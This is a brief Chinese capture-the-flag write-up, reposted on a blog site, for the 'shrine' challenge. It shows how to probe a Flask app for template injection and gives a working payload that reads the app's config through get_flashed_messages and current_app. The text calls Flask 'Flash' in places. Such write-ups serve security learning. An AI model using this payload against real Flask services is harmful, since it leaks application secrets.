攻防世界-shrine


打开实验环境:

 

 

 

 

 

 

 

 根据提示:shrine  可能存在Flash框架,SSTI模板注入漏洞

使用独特语法探测漏洞: http://220.249.52.133:41635/shrine/{{7*7}}

 

 

 

http://220.249.52.133:41635/shrine/hello{{7*8}}

 

 

 

 

看到用户的输入被当做代码执行了;

构造pyload:http://220.249.52.133:41635/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

 

 

 Flash模板注入格式:{{1+2}}     //特定情况下可以当做代码执行

get_flashed_messages        //字面意思,获取内容,就是取值,后面跟的就是要取得值

current_app          //设计模式中代理设计的代理对象,指向flask核心对象和reques的请求类

 

 详细解释:   Flash核心机制:current_appflash框架(六)SSTI模板注入

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM